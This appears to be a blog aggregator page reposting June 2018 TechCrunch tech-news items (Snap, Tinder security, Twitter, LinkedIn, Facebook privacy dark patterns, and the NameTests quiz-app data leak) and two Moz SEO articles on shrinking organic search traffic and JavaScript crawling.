Saturday, 30 June 2018

Benchmark’s Mitch Lasky will reportedly step down from Snap’s board of directors

Benchmark partner Mitch Lasky, who has served on Snap’s board of directors since December 2012, is not expected to stand for re-election to Snap’s board of directors and will thus be stepping down, according to a report by The Information.

Early investors stepping down from the board of directors — or at least not seeking re-election — isn’t that uncommon as once-private companies grow into larger public ones. Benchmark partner Peter Fenton did not seek re-election for Twitter’s board of directors in April last year. As Snap continues to navigate its future, especially as it has declined precipitously since going public and now sits at a valuation of around $16.5 billion. Partners with an expertise in the early-stage and later-stage startup life cycle may end up seeing themselves more useful taking a back seat and focusing on other investments. The voting process for board member re-election happens during the company’s annual meeting, so we’ll get more information when an additional proxy filing comes out ahead of the meeting later this year.

Benchmark is, or at least was at the time of going public last year, one of Snap’s biggest shareholders. According to the company’s 424B filing prior to going public in March last year, Benchmark held ownership of 23.1% of Snap’s Class B common stock and 8.2% of Snap’s Class A common stock. Lasky has been with Benchmark since April 2007, and also serves on the boards of a number of gaming companies like Riot Games and thatgamecompany, the creators of PlayStation titles flower and Journey. At the time, Snap said in its filing that Lasky was “qualified to serve as a member of our board of directors due to his extensive experience with social media and technology companies, as well as his experience as a venture capitalist investing in technology companies.”

The timing could be totally coincidental, but an earlier Recode report suggested Lasky had been talking about stepping down in future funds for Benchmark. The firm only recently wrapped up a very public battle with Uber, which ended up with Benchmark selling a significant stake in the company and a new CEO coming in to replace co-founder Travis Kalanick. Benchmark hired its first female general partner, Sarah Tavel, earlier this year.

We’ve reached out to both Snap and a representative from Benchmark for comment and will update the story when we hear back.



source https://techcrunch.com/2018/06/29/benchmarks-mitch-lasky-will-reportedly-step-down-from-snaps-board-of-directors/

Friday, 29 June 2018

Tinder bolsters its security to ward off hacks and blackmail

This week, Tinder responded to a letter from Oregon Senator Ron Wyden calling for the company to seal up security loopholes in its app that could lead to blackmail and other privacy incursions.

In a letter to Sen. Wyden, Match Group General Counsel Jared Sine describes recent changes to the app, noting that as of June 19, “swipe data has been padded such that all actions are now the same size.” Sine added that images on the mobile app are fully encrypted as of February 6, while images on the web version of Tinder were already encrypted.

The Tinder issues were first called out in a report by a research team at Checkmarx describing the app’s “disturbing vulnerabilities” and their propensity for blackmail:

“The vulnerabilities, found in both the app’s Android and iOS versions, allow an attacker using the same network as the user to monitor the user’s every move on the app. It is also possible for an attacker to take control over the profile pictures the user sees, swapping them for inappropriate content, rogue advertising or other type of malicious content (as demonstrated in the research).

“While no credential theft and no immediate financial impact are involved in this process, an attacker targeting a vulnerable user can blackmail the victim, threatening to expose highly private information from the user’s Tinder profile and actions in the app.”

In February, Wyden called for Tinder to address the vulnerability by encrypting all data that moves between its servers and the app and by padding data to obscure it from hackers. In a statement to TechCrunch at the time, Tinder indicated that it heard Sen. Wyden’s concerns and had recently implemented encryption for profile photos in the interest of moving toward deepening its privacy practices.

“Like every technology company, we are constantly working to improve our defenses in the battle against malicious hackers and cyber criminals” Sine said in the letter. “… Our goal is to have protocols and systems that not only meet, but exceed industry best practices.”



source https://techcrunch.com/2018/06/29/tinder-security-update/

Twitter gets a re-org and new product head

Twitter has a new product manager in the wake of a large re-org of the company announced this week. The changes will see Twitter dividing its business into groups including engineering, product, revenue product, design and research, and more, while also bringing on Kayvon Beykpour, the GM of video and former Periscope CEO, as product head.

Beykpour will replace Ed Ho, vice president of product and engineering, as Ho steps down into a part-time role. In a series of tweets, Ho explains his decision was based on a family loss, and says he hopes to return full-time in the future. He had been on leave from Twitter since May.

As Recode noted, these change will make Beykpour the sixth exec to head up product since early 2014.

Meanwhile, Ho’s other role — head of engineering — will now be overseen by Mike Montano, who is stepping up from product engineering.

Twitter CEO’s announcement of the changes, below, was tweeted out on Thursday:



source https://techcrunch.com/2018/06/29/twitter-gets-a-re-org-and-new-product-head/

What Do SEOs Do When Google Removes Organic Search Traffic? - Whiteboard Friday

Posted by randfish

We rely pretty heavily on Google, but some of their decisions of late have made doing SEO more difficult than it used to be. Which organic opportunities have been taken away, and what are some potential solutions? Rand covers a rather unsettling trend for SEO in this week's Whiteboard Friday.

What Do SEOs Do When Google Removes Organic Search?

Click on the whiteboard image above to open a high-resolution version in a new tab!

Video Transcription

Howdy, Moz fans, and welcome to another edition of Whiteboard Friday. This week we're talking about something kind of unnerving. What do we, as SEOs, do as Google is removing organic search traffic?

So for the last 19 years or 20 years that Google has been around, every month Google has had, at least seasonally adjusted, not just more searches, but they've sent more organic traffic than they did that month last year. So this has been on a steady incline. There's always been more opportunity in Google search until recently, and that is because of a bunch of moves, not that Google is losing market share, not that they're receiving fewer searches, but that they are doing things that makes SEO a lot harder.

Some scary news

Things like...

  • Aggressive "answer" boxes. So you search for a question, and Google provides not just necessarily a featured snippet, which can earn you a click-through, but a box that truly answers the searcher's question, that comes directly from Google themselves, or a set of card-style results that provides a list of all the things that the person might be looking for.
  • Google is moving into more and more aggressively commercial spaces, like jobs, flights, products, all of these kinds of searches where previously there was opportunity and now there's a lot less. If you're Expedia or you're Travelocity or you're Hotels.com or you're Cheapflights and you see what's going on with flight and hotel searches in particular, Google is essentially saying, "No, no, no. Don't worry about clicking anything else. We've got the answers for you right here."
  • We also saw for the first time a seasonally adjusted drop, a drop in total organic clicks sent. That was between August and November of 2017. It was thanks to the Jumpshot dataset. It happened at least here in the United States. We don't know if it's happened in other countries as well. But that's certainly concerning because that is not something we've observed in the past. There were fewer clicks sent than there were previously. That makes us pretty concerned. It didn't go down very much. It went down a couple of percentage points. There's still a lot more clicks being sent in 2018 than there were in 2013. So it's not like we've dipped below something, but concerning.
  • New zero-result SERPs. We absolutely saw those for the first time. Google rolled them back after rolling them out. But, for example, if you search for the time in London or a Lagavulin 16, Google was showing no results at all, just a little box with the time and then potentially some AdWords ads. So zero organic results, nothing for an SEO to even optimize for in there.
  • Local SERPs that remove almost all need for a website. Then local SERPs, which have been getting more and more aggressively tuned so that you never need to click the website, and, in fact, Google has made it harder and harder to find the website in both mobile and desktop versions of local searches. So if you search for Thai restaurant and you try and find the website of the Thai restaurant you're interested in, as opposed to just information about them in Google's local pack, that's frustratingly difficult. They are making those more and more aggressive and putting them more forward in the results.

Potential solutions for marketers

So, as a result, I think search marketers really need to start thinking about: What do we do as Google is taking away this opportunity? How can we continue to compete and provide value for our clients and our companies? I think there are three big sort of paths — I won't get into the details of the paths — but three big paths that we can pursue.

1. Invest in demand generation for your brand + branded product names to leapfrog declines in unbranded search.

The first one is pretty powerful and pretty awesome, which is investing in demand generation, rather than just demand serving, but demand generation for brand and branded product names. Why does this work? Well, because let's say, for example, I'm searching for SEO tools. What do I get? I get back a list of results from Google with a bunch of mostly articles saying these are the top SEO tools. In fact, Google has now made a little one box, card-style list result up at the top, the carousel that shows different brands of SEO tools. I don't think Moz is actually listed in there because I think they're pulling from the second or the third lists instead of the first one. Whatever the case, frustrating, hard to optimize for. Google could take away demand from it or click-through rate opportunity from it.

But if someone performs a search for Moz, well, guess what? I mean we can nail that sucker. We can definitely rank for that. Google is not going to take away our ability to rank for our own brand name. In fact, Google knows that, in the navigational search sense, they need to provide the website that the person is looking for front and center. So if we can create more demand for Moz than there is for SEO tools, which I think there's something like 5 or 10 times more demand already for Moz than there is tools, according to Google Trends, that's a great way to go. You can do the same thing through your content, through your social media, and through your email marketing. Even through search you can search and create demand for your brand rather than unbranded terms.

2. Optimize for additional platforms.

Second thing, optimizing across additional platforms. So we've looked and YouTube and Google Images account for about half of the overall volume that goes to Google web search. So between these two platforms, you've got a significant amount of additional traffic that you can optimize for. Images has actually gotten less aggressive. Right now they've taken away the "view image directly" link so that more people are visiting websites via Google Images. YouTube, obviously, this is a great place to build brand affinity, to build awareness, to create demand, this kind of demand generation to get your content in front of people. So these two are great platforms for that.

There are also significant amounts of web traffic still on the social web — LinkedIn, Facebook, Twitter, Pinterest, Instagram, etc., etc. The list goes on. Those are places where you can optimize, put your content forward, and earn traffic back to your websites.

3. Optimize the content that Google does show.

Local

So if you're in the local space and you're saying, "Gosh, Google has really taken away the ability for my website to get the clicks that it used to get from Google local searches," going into Google My Business and optimizing to provide information such that people who perform that query will be satisfied by Google's result, yes, they won't get to your website, but they will still come to your business, because you've optimized the content such that Google is showing, through Google My Business, such that those searchers want to engage with you. I think this sometimes gets lost in the SEO battle. We're trying so hard to earn the click to our site that we're forgetting that a lot of search experience ends right at the SERP itself, and we can optimize there too.

Results

In the zero-results sets, Google was still willing to show AdWords, which means if we have customer targets, we can use remarketed lists for search advertising (RLSA), or we can run paid ads and still optimize for those. We could also try and claim some of the data that might show up in zero-result SERPs. We don't yet know what that will be after Google rolls it back out, but we'll find out in the future.

Answers

For answers, the answers that Google is giving, whether that's through voice or visually, those can be curated and crafted through featured snippets, through the card lists, and through the answer boxes. We have the opportunity again to influence, if not control, what Google is showing in those places, even when the search ends at the SERP.

All right, everyone, thanks for watching for this edition of Whiteboard Friday. We'll see you again next week. Take care.

Video transcription by Speechpad.com


Sign up for The Moz Top 10, a semimonthly mailer updating you on the top ten hottest pieces of SEO news, tips, and rad links uncovered by the Moz team. Think of it as your exclusive digest of stuff you don't have time to hunt down but want to read!



source https://moz.com/blog/google-removing-organic-traffic

Thursday, 28 June 2018

Twitter launches its Ads Transparency Center, where you can see ads bought by any account

Twitter is unveiling the Ads Transparency Center that it announced back in October.

This comes as Twitter and other online platforms have faced growing political scrutiny around the role they may have played in spreading misinformation, particularly in the 2016 U.S. presidential election.

For example, House Democrats recently released thousands of of Russian-funded political Facebook ads, and Facebook will reportedly release its own ad transparency tool this week. (In fact, as this story publishes, I’m at a Facebook press event focused on ad transparency.)

Twitter says that with this tool, you should be able to search for any Twitter handle and bring up all the ad campaigns from that account that have run for the past seven days. For political advertisers in the U.S., there will be additional data, including information around billing, ad spend, impressions per tweet and demographic targeting.

Everyone should be able to access the Ads Transparency Center, no login required.

Twitter political ads

As part of  the political ad guidelines that Twitter announced last month, the company says it will be visually identifying ads that are tied to federal elections in the United States. Over time, it plans to develop a policy specifically around “issue ads” (i.e., political ads that aren’t explicitly promoting a candidate) and looking for ways to expand these policies internationally.

“We are doing our due diligence to get this right and will have more updates to come,” writes Twitter’s Bruce Falck in a blog post. “We stay committed to iterating and improving our work in this space, and doing what’s right for our community.”



source https://techcrunch.com/2018/06/28/twitter-ads-transparency-center/

LinkedIn adds Microsoft-powered translations and QR codes to connect more of its users faster

LinkedIn — the social network with more than 560 million members who connect around work-related topics and job-seeking — continues to add more features, integrating technology from its new owner Microsoft, both to improve engagement on LinkedIn as well as to create deeper data ties between the two businesses.

Today, the company announced two more: users can now instantly view translations of content on the site when it appears in a language that is not the one set as a default; and they can now use QR codes to quickly swap contact details with other LinkedIn members.

In both cases, the features are likely overdue. The lingua franca of LinkedIn seems to be English, but the platform has a large global reach, and as it continues to try to expand to a wider range of later adopters and different categories of users, having a translation feature seems to be a no-brainer. It would also put it in closer line with the likes of Twitter and Facebook, which have had translation options for years.

The QR code generator, meanwhile, has become a key way for people to swap their details when they are not already connected on a network. And with LinkedIn this makes a lot of sense: there are so many people with the same name and it can be a challenge figuring out which “Mark Smith” you might want to connect with after coming across him at an event. And given that LinkedIn has been looking for more ways of making its app useful in in-person situations, this is an obvious way to enable that.

Translations are coming by way of the Microsoft Text Analytics API, the same Azure Cognitive Service  that powers translations on Bing, Skype and Office (as well as third-party services like Twitter). It will be available in more than 60 languages, with more coming soon, LinkedIn says, to a “majority” of members using either the desktop or mobile web versions of LinkedIn.

The company says that it will be coming to LinkedIn’s iOS and Android apps in due course, as well. Users will get the “see translation” link based on a number of signals you’re providing to LinkedIn that include your language setting on the platform, the country where you are accessing content and the language you have used in your profile.

Content covered by the option to translate will include the main feed, the activity section on a person’s profile and posts if you click on them in the feed or share it.

Meanwhile, with QR codes, you trigger the ability to capture one by clicking in the search box on the iOS or Android app. Through that window, you can also pick up your own code to share with others.

LinkedIn suggests that the QR code can effectively become the replacement for the business card for people when they are at in-person events. But another option is that you can use this now in any place where you might want to provide a shortcut to your profile.



source https://techcrunch.com/2018/06/28/linkedin-adds-microsoft-powered-translations-and-qr-codes-to-connect-more-of-its-users-faster/

Study calls out ‘dark patterns’ in Facebook and Google that push users toward less privacy

More scrutiny than ever is in place on the tech industry, and while high-profile cases like Mark Zuckerberg’s appearance in front of lawmakers garner headlines, there are subtler forces at work. This study from a Norway watchdog group eloquently and painstakingly describes the ways that companies like Facebook and Google push their users towards making choices that negatively affect their own privacy.

It was spurred, like many other new inquiries, by Europe’s GDPR, which has caused no small amount of consternation among companies for whom collecting and leveraging user data is their main source of income.

The report (PDF) goes into detail on exactly how these companies create an illusion of control over your data while simultaneously nudging you towards making choices that limit that control.

Although the companies and their products will be quick to point out that they are in compliance with the requirements of the GDPR, there are still plenty of ways in which they can be consumer-unfriendly.

In going through a set of privacy popups put out in May by Facebook, Google, and Microsoft, the researchers found that the first two especially feature “dark patterns, techniques and features of interface design mean to manipulate users…used to nudge users towards privacy intrusive options.”

Flowchart illustrating the Facebook privacy options process – the green boxes are the “easy” route.

It’s not big obvious things — in fact, that’s the point of these “dark patterns”: that they are small and subtle yet effective ways of guiding people towards the outcome preferred by the designers.

For instance, in Facebook and Google’s privacy settings process, the more private options are simply disabled by default, and users not paying close attention will not know that there was a choice to begin with. You’re always opting out of things, not in. To enable these options is also a considerably longer process: 13 clicks or taps versus 4 in Facebook’s case.

That’s especially troubling when the companies are also forcing this action to take place at a time of their choosing, not yours. And Facebook added a cherry on top, almost literally, with the fake red dots that appeared behind the privacy popup, suggesting users had messages and notifications waiting for them even if that wasn’t the case.

When choosing the privacy-enhancing option, such as disabling face recognition, users are presented with a tailored set of consequences: “we won’t be able to use this technology if a stranger uses your photo to impersonate you,” for instance, to scare the user into enabling it. But nothing is said about what you will be opting into, such as how your likeness could be used in ad targeting or automatically matched to photos taken by others.

Disabling ad targeting on Google, meanwhile, warns you that you will not be able to mute some ads going forward. People who don’t understand the mechanism of muting being referred to here will be scared of the possibility — what if an ad pops up at work or during a show and I can’t mute it? So they agree to share their data.

Before you make a choice, you have to hear Facebook’s case.

In this way users are punished for choosing privacy over sharing, and are always presented only with a carefully curated set of pros and cons intended to cue the user to decide in favor of sharing. “You’re in control,” the user is constantly told, though those controls are deliberately designed to undermine what control you do have and exert.

Microsoft, while guilty of the biased phrasing, received much better marks in the report. Its privacy setup process put the less and more private options right next to each other, presenting them as equally valid choices rather than some tedious configuration tool that might break something if you’re not careful. Subtle cues do push users towards sharing more data or enabling voice recognition, but users aren’t punished or deceived the way they are elsewhere.

You may already have been aware of some of these tactics, as I was, but it makes for interesting reading nevertheless. We tend to discount these things when it’s just one screen here or there, but seeing them all together along with a calm explanation of why they are the way they are makes it rather obvious that there’s something insidious at play here.



source https://techcrunch.com/2018/06/27/study-calls-out-dark-patterns-in-facebook-and-google-that-push-users-towards-less-privacy/

Yet another massive Facebook fail: Quiz app leaked data on ~120M users for years

Facebook knows the historical app audit it’s conducting in the wake of the Cambridge Analytica data misuse scandal is going to result in a tsunami of skeletons tumbling out of its closet.

It’s already suspended around 200 apps as a result of the audit — which remains ongoing, with no formal timeline announced for when the process (and any associated investigations that flow from it) will be concluded.

CEO Mark Zuckerberg announced the audit on March 21, writing then that the company would “investigate all apps that had access to large amounts of information before we changed our platform to dramatically reduce data access in 2014, and we will conduct a full audit of any app with suspicious activity”.

But you do have to question how much the audit exercise is, first and foremost, intended to function as PR damage limitation for Facebook’s brand — given the company’s relaxed response to a data abuse report concerning a quiz app with ~120M monthly users, which it received right in the midst of the Cambridge Analytica scandal.

Because despite Facebook being alerted about the risk posed by the leaky quiz apps in late April — via its own data abuse bug bounty program — they were still live on its platform a month later.

It took about a further month for the vulnerability to be fixed.

And, sure, Facebook was certainly busy over that period. Busy dealing with a major privacy scandal.

Perhaps the company was putting rather more effort into pumping out a steady stream of crisis PR — including taking out full page newspaper adverts (where it wrote that: “we have a responsibility to protect your information. If we can’t, we don’t deserve it”) — vs actually ‘locking down the platform’, per its repeat claims, even though the company’s long and rich privacy-hostile history suggests otherwise.

Let’s also not forget that, in early April, Facebook quietly confessed to a major security flaw of its own — when it admitted that an account search and recovery feature had been abused by “malicious actors” who, over what must have been a period of several years, had been able to surreptitiously collect personal data on a majority of Facebook’s ~2BN users — and use that intel for whatever they fancied.

So Facebook users already have plenty reasons to doubt the company’s claims to be able to “protect your information”. But this latest data fail facepalm suggests it’s hardly scrambling to make amends for its own stinkingly bad legacy either.

Change will require regulation. And in Europe that has arrived, in the form of the GDPR.

Although it remains to be seen whether Facebook will face any data breach complaints in this specific instance, i.e. for not disclosing to affected users that their information was at risk of being exposed by the leaky quiz apps.

The regulation came into force on May 25 — and the javascript vulnerability was not fixed until June. So there may be grounds for concerned consumers to complain.

Which Facebook data abuse victim am I?

Writing in a Medium post, the security researcher who filed the report — self-styled “hacker” Inti De Ceukelaire — explains he went hunting for data abusers on Facebook’s platform after the company announced a data abuse bounty on April 10, as the company scrambled to present a responsible face to the world following revelations that a quiz app running on its platform had surreptitiously harvested millions of users’ data — data that had been passed to a controversial UK firm which intended to use it to target political ads at US voters.

De Ceukelaire says he began his search by noting down what third party apps his Facebook friends were using — finding quizzes were one of the most popular apps. Plus he already knew quizzes had a reputation for being data-suckers in a distracting wrapper. So he took his first ever Facebook quiz, from a brand called NameTests.com, and quickly realized the company was exposing Facebook users’ data to “any third-party that requested it”.

The issue was that NameTests was displaying the quiz taker’s personal data (such as full name, location, age, birthday) in a javascript file — thereby potentially exposing the identify and other data on logged in Facebook users to any external website they happened to visit.

He also found it was providing an access token that allowed it to grant even more expansive data access permissions to third party websites — such as to users’ Facebook posts, photos and friends.

It’s not clear exactly why — but presumably relates to the quiz app company’s own ad targeting activities. (Its privacy policy states: “We work together with various technological partners who, for example, display advertisements on the basis of user data. We make sure that the user’s data is pseudonymised (e.g. no clear data such as names or e-mail addresses) and that users have simple rights of revocation at their disposal. We also conclude special data protection agreements with our partners, in which they commit themselves to the protection of user data.” — which sounds great until you realize its javascript was just leaking people’s personally identified data… [facepalm])

“Depending on what quizzes you took, the javascript could leak your facebook ID, first name, last name, language, gender, date of birth, profile picture, cover photo, currency, devices you use, when your information was last updated, your posts and statuses, your photos and your friends,” writes De Ceukelaire.

He reckons people’s data had been being publicly exposed since at least the end of 2016.

On Facebook, NameTests describes its purpose thusly: “Our goal is simple: To make people smile!” — adding that its quizzes are intended as a bit of “fun”.

It doesn’t shout so loudly that the ‘price’ for taking one of its quizzes, say to find out what Disney princess you ‘are’, or what you could look like as an oil painting, is not only that it will suck out masses of your personal data (and potentially your friends’ data) from Facebook’s platform for its own ad targeting purposes but was also, until recently, that your and other people’s information could have been exposed to goodness knows who, for goodness knows what nefarious purposes… 

The Facebook-Cambridge Analytica data misuse scandal has underlined that ostensibly frivolous social data can end up being repurposed for all sorts of manipulative and power-grabbing purposes. (And not only can end up, but that quizzes are deliberately built to be data-harvesting tools… So think of that the next time you get a ‘take this quiz’ notification asking ‘what is in your fact file?’ or ‘what has your date of birth imprinted on you’? And hope ads is all you’re being targeted for… )

De Ceukelaire found that NameTests would still reveal Facebook users’ identity even after its app was deleted.

“In order to prevent this from happening, the user would have had to manually delete the cookies on their device, since NameTests.com does not offer a log out functionality,” he writes.

“I would imagine you wouldn’t want any website to know who you are, let alone steal your information or photos. Abusing this flaw, advertisers could have targeted (political) ads based on your Facebook posts and friends. More explicit websites could have abused this flaw to blackmail their visitors, threatening to leak your sneaky search history to your friends,” he adds, fleshing out the risks for affected Facebook users.

As well as alerting Facebook to the vulnerability, De Ceukelaire says he contacted NameTests — and they claimed to have found no evidence of abuse by a third party. They also said they would make changes to fix the issue.

We’ve reached out to NameTests’ parent company — a German firm called Social Sweethearts — for comment. Its website touts a “data-driven approach” — and claims its portfolio of products achieve “a global organic reach of several billion page views per month”.

After De Ceukelaire reported the problem to Facebook, he says he received an initial response from the company on April 30 saying they were looking into it. Then, hearing nothing for some weeks, he sent a follow up email, on May 14, asking whether they had contacted the app developers.

A week later Facebook replied saying it could take three to six months to investigate the issue (i.e. the same timeframe mentioned in their initial automated reply), adding they would keep him in the loop.

Yet at that time — which was a month after his original report — the leaky NameTests quizzes were still up and running,  meaning Facebook users’ data was still being exposed and at risk. And Facebook knew about the risk.

The next development came on June 25, when De Ceukelaire says he noticed NameTests had changed the way they process data to close down the access they had been exposing to third parties.

Two days later Facebook also confirmed the flaw in writing, admitting: “[T]his could have allowed an attacker to determine the details of a logged-in user to Facebook’s platform.”

It also told him it had confirmed with NameTests the issue had been fixed. And its apps continue to be available on Facebook’s platform — suggesting Facebook did not find the kind of suspicious activity that has led it to suspend other third party apps. (At least, assuming it conducted an investigation.)

Facebook paid out a $4,000 x2 bounty to a charity under the terms of its data abuse bug bounty program — and per De Ceukelaire’s request.

We asked it what took it so long to respond to the data abuse report, especially given the issue was so topical when De Ceukelaire filed the report. But Facebook declined to answer specific questions.

Instead it sent us the following statement, attributed to Ime Archibong, its VP of product partnerships:

A researcher brought the issue with the nametests.com website to our attention through our Data Abuse Bounty Program that we launched in April to encourage reports involving Facebook data. We worked with nametests.com to resolve the vulnerability on their website, which was completed in June.

Facebook also claims it received De Ceukelaire’s report on April 27, rather than April 22, as he recounts it. Though it’s possible the former date is when Facebook’s own staff retrieved the report from its systems. 

Beyond displaying a disturbingly relaxed attitude to other people’s privacy — which risks getting Facebook into regulatory trouble, given GDPR’s strict requirements around breach disclosure, for example — the other core issue of concern here is the company’s apparent failure to enforce its own developer policy. 

The underlying issue is whether or not Facebook performs any checks on apps running on its platform. It’s no good having T&Cs if you don’t have any active processes to enforce your T&Cs. Rules without enforcement aren’t worth the paper they’re written on.

Historical evidence suggests Facebook did not actively enforce its developer T&Cs — even if it’s now “locking down the platform”, as it claims, as a result of so many privacy scandals. 

The quiz app developer at the center of the Cambridge Analytica scandal, Aleksandr Kogan — who harvested and sold/passed Facebook user data to third parties — has accused Facebook of essentially not having a policyHe contends it is therefore Facebook who is responsible for the massive data abuses that have played out on its platform — only a portion of which have so far come to light. 

Fresh examples such as NameTests’ leaky quiz apps merely bolster the case Kogan made for Facebook being the guilty party where data misuse is concerned. After all, if you built some stables without any doors at all would you really blame your horses for bolting?



source https://techcrunch.com/2018/06/28/facepalm-2/

The Minimum Viable Knowledge You Need to Work with JavaScript & SEO Today

Posted by sergeystefoglo

If your work involves SEO at some level, you’ve most likely been hearing more and more about JavaScript and the implications it has on crawling and indexing. Frankly, Googlebot struggles with it, and many websites utilize modern-day JavaScript to load in crucial content today. Because of this, we need to be equipped to discuss this topic when it comes up in order to be effective.

The goal of this post is to equip you with the minimum viable knowledge required to do so. This post won’t go into the nitty gritty details, describe the history, or give you extreme detail on specifics. There are a lot of incredible write-ups that already do this — I suggest giving them a read if you are interested in diving deeper (I’ll link out to my favorites at the bottom).

In order to be effective consultants when it comes to the topic of JavaScript and SEO, we need to be able to answer three questions:

  1. Does the domain/page in question rely on client-side JavaScript to load/change on-page content or links?
  2. If yes, is Googlebot seeing the content that’s loaded in via JavaScript properly?
  3. If not, what is the ideal solution?

With some quick searching, I was able to find three examples of landing pages that utilize JavaScript to load in crucial content.

I’m going to be using Sitecore’s Symposium landing page through each of these talking points to illustrate how to answer the questions above.

We’ll cover the “how do I do this” aspect first, and at the end I’ll expand on a few core concepts and link to further resources.

Question 1: Does the domain in question rely on client-side JavaScript to load/change on-page content or links?

The first step to diagnosing any issues involving JavaScript is to check if the domain uses it to load in crucial content that could impact SEO (on-page content or links). Ideally this will happen anytime you get a new client (during the initial technical audit), or whenever your client redesigns/launches new features of the site.

How do we go about doing this?

Ask the client

Ask, and you shall receive! Seriously though, one of the quickest/easiest things you can do as a consultant is contact your POC (or developers on the account) and ask them. After all, these are the people who work on the website day-in and day-out!

“Hi [client], we’re currently doing a technical sweep on the site. One thing we check is if any crucial content (links, on-page content) gets loaded in via JavaScript. We will do some manual testing, but an easy way to confirm this is to ask! Could you (or the team) answer the following, please?

1. Are we using client-side JavaScript to load in important content?
2. If yes, can we get a bulleted list of where/what content is loaded in via JavaScript?”

Check manually

Even on a large e-commerce website with millions of pages, there are usually only a handful of important page templates. In my experience, it should only take an hour max to check manually. I use the Chrome Web Developers plugin, disable JavaScript from there, and manually check the important templates of the site (homepage, category page, product page, blog post, etc.)

In the example above, once we turn off JavaScript and reload the page, we can see that we are looking at a blank page.

As you make progress, jot down notes about content that isn’t being loaded in, is being loaded in wrong, or any internal linking that isn’t working properly.

At the end of this step we should know if the domain in question relies on JavaScript to load/change on-page content or links. If the answer is yes, we should also know where this happens (homepage, category pages, specific modules, etc.)

Crawl

You could also crawl the site (with a tool like Screaming Frog or Sitebulb) with JavaScript rendering turned off, and then run the same crawl with JavaScript turned on, and compare the differences with internal links and on-page elements.

For example, it could be that when you crawl the site with JavaScript rendering turned off, the title tags don’t appear. In my mind this would trigger an action to crawl the site with JavaScript rendering turned on to see if the title tags do appear (as well as checking manually).

Example

For our example, I went ahead and did a manual check. As we can see from the screenshot below, when we disable JavaScript, the content does not load.

In other words, the answer to our first question for this pages is “yes, JavaScript is being used to load in crucial parts of the site.”

Question 2: If yes, is Googlebot seeing the content that’s loaded in via JavaScript properly?

If your client is relying on JavaScript on certain parts of their website (in our example they are), it is our job to try and replicate how Google is actually seeing the page(s). We want to answer the question, “Is Google seeing the page/site the way we want it to?”

In order to get a more accurate depiction of what Googlebot is seeing, we need to attempt to mimic how it crawls the page.

How do we do that?

Use Google’s new mobile-friendly testing tool

At the moment, the quickest and most accurate way to try and replicate what Googlebot is seeing on a site is by using Google’s new mobile friendliness tool. My colleague Dom recently wrote an in-depth post comparing Search Console Fetch and Render, Googlebot, and the mobile friendliness tool. His findings were that most of the time, Googlebot and the mobile friendliness tool resulted in the same output.

In Google’s mobile friendliness tool, simply input your URL, hit “run test,” and then once the test is complete, click on “source code” on the right side of the window. You can take that code and search for any on-page content (title tags, canonicals, etc.) or links. If they appear here, Google is most likely seeing the content.

Search for visible content in Google

It’s always good to sense-check. Another quick way to check if GoogleBot has indexed content on your page is by simply selecting visible text on your page, and doing a site:search for it in Google with quotations around said text.

In our example there is visible text on the page that reads…

"Whether you are in marketing, business development, or IT, you feel a sense of urgency. Or maybe opportunity?"

When we do a site:search for this exact phrase, for this exact page, we get nothing. This means Google hasn’t indexed the content.

Crawling with a tool

Most crawling tools have the functionality to crawl JavaScript now. For example, in Screaming Frog you can head to configuration > spider > rendering > then select “JavaScript” from the dropdown and hit save. DeepCrawl and SiteBulb both have this feature as well.

From here you can input your domain/URL and see the rendered page/code once your tool of choice has completed the crawl.

Example:

When attempting to answer this question, my preference is to start by inputting the domain into Google’s mobile friendliness tool, copy the source code, and searching for important on-page elements (think title tag, <h1>, body copy, etc.) It’s also helpful to use a tool like diff checker to compare the rendered HTML with the original HTML (Screaming Frog also has a function where you can do this side by side).

For our example, here is what the output of the mobile friendliness tool shows us.

After a few searches, it becomes clear that important on-page elements are missing here.

We also did the second test and confirmed that Google hasn’t indexed the body content found on this page.

The implication at this point is that Googlebot is not seeing our content the way we want it to, which is a problem.

Let’s jump ahead and see what we can recommend the client.

Question 3: If we’re confident Googlebot isn’t seeing our content properly, what should we recommend?

Now we know that the domain is using JavaScript to load in crucial content and we know that Googlebot is most likely not seeing that content, the final step is to recommend an ideal solution to the client. Key word: recommend, not implement. It’s 100% our job to flag the issue to our client, explain why it’s important (as well as the possible implications), and highlight an ideal solution. It is 100% not our job to try to do the developer’s job of figuring out an ideal solution with their unique stack/resources/etc.

How do we do that?

You want server-side rendering

The main reason why Google is having trouble seeing Sitecore’s landing page right now, is because Sitecore’s landing page is asking the user (us, Googlebot) to do the heavy work of loading the JavaScript on their page. In other words, they’re using client-side JavaScript.

Googlebot is literally landing on the page, trying to execute JavaScript as best as possible, and then needing to leave before it has a chance to see any content.

The fix here is to instead have Sitecore’s landing page load on their server. In other words, we want to take the heavy lifting off of Googlebot, and put it on Sitecore’s servers. This will ensure that when Googlebot comes to the page, it doesn’t have to do any heavy lifting and instead can crawl the rendered HTML.

In this scenario, Googlebot lands on the page and already sees the HTML (and all the content).

There are more specific options (like isomorphic setups)

This is where it gets to be a bit in the weeds, but there are hybrid solutions. The best one at the moment is called isomorphic.

In this model, we're asking the client to load the first request on their server, and then any future requests are made client-side.

So Googlebot comes to the page, the client’s server has already executed the initial JavaScript needed for the page, sends the rendered HTML down to the browser, and anything after that is done on the client-side.

If you’re looking to recommend this as a solution, please read this post from the AirBNB team which covers isomorphic setups in detail.

AJAX crawling = no go

I won’t go into details on this, but just know that Google’s previous AJAX crawling solution for JavaScript has since been discontinued and will eventually not work. We shouldn’t be recommending this method.

(However, I am interested to hear any case studies from anyone who has implemented this solution recently. How has Google responded? Also, here’s a great write-up on this from my colleague Rob.)

Summary

At the risk of severely oversimplifying, here's what you need to do in order to start working with JavaScript and SEO in 2018:

  1. Know when/where your client’s domain uses client-side JavaScript to load in on-page content or links.
    1. Ask the developers.
    2. Turn off JavaScript and do some manual testing by page template.
    3. Crawl using a JavaScript crawler.
  2. Check to see if GoogleBot is seeing content the way we intend it to.
    1. Google’s mobile friendliness checker.
    2. Doing a site:search for visible content on the page.
    3. Crawl using a JavaScript crawler.
  3. Give an ideal recommendation to client.
    1. Server-side rendering.
    2. Hybrid solutions (isomorphic).
    3. Not AJAX crawling.

Further resources

I’m really interested to hear about any of your experiences with JavaScript and SEO. What are some examples of things that have worked well for you? What about things that haven’t worked so well? If you’ve implemented an isomorphic setup, I’m curious to hear how that’s impacted how Googlebot sees your site.


Sign up for The Moz Top 10, a semimonthly mailer updating you on the top ten hottest pieces of SEO news, tips, and rad links uncovered by the Moz team. Think of it as your exclusive digest of stuff you don't have time to hunt down but want to read!



source https://moz.com/blog/javascript-and-seo

Wednesday, 27 June 2018

Facebook tests 30-day keyword snoozing to fight spoilers, triggers

